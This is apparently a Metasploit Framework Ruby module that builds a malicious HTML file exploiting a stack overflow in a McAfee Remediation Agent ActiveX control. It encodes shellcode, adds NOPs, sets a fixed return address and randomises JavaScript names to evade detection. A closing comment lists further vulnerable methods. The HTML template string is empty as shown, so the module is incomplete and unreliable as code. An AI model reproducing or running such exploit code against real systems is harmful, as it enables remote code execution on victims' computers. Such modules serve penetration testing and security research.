### ## This file is part of the Metasploit Framework and may be subject to ## redistribution and commercial restrictions. Please see the Metasploit ## Framework web site for more information on licensing and terms of use. ## http://metasploit.com/projects/Framework/ ### require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'McAfee Remediation Client ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in McAfee Remediation Agent 4.5.0.41. When sending an overly long string to the DeleteSnapshot() method of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Aug 4 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), ], self.class) end def exploit # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) # Randomize the javascript variable names. vname = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(30) + 2) rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) content = %Q| | content = Rex::Text.randomize_space(content) print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(content) end end =begin Other vulnerable method's: [id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")] void CreateSnapFromDefaultProfile(BSTR szDescription); [id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")] void CreateReportOfSysInfoDifferences( BSTR szOldSnapFile, BSTR szNewSnapFile, BSTR szOutFile, short format, short append); [id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")] void CreateReportOfSnapshotDifferences( BSTR szOldSnapFile, BSTR szNewSnapFile, BSTR szOutFile, short format); [id(0x00000012), helpstring("method CreateReportOfAssetDifferences")] void CreateReportOfAssetDifferences( BSTR szOldSnapFile, BSTR szNewSnapFile, BSTR szOutFile, short format, BSTR pszAsset, short append); =end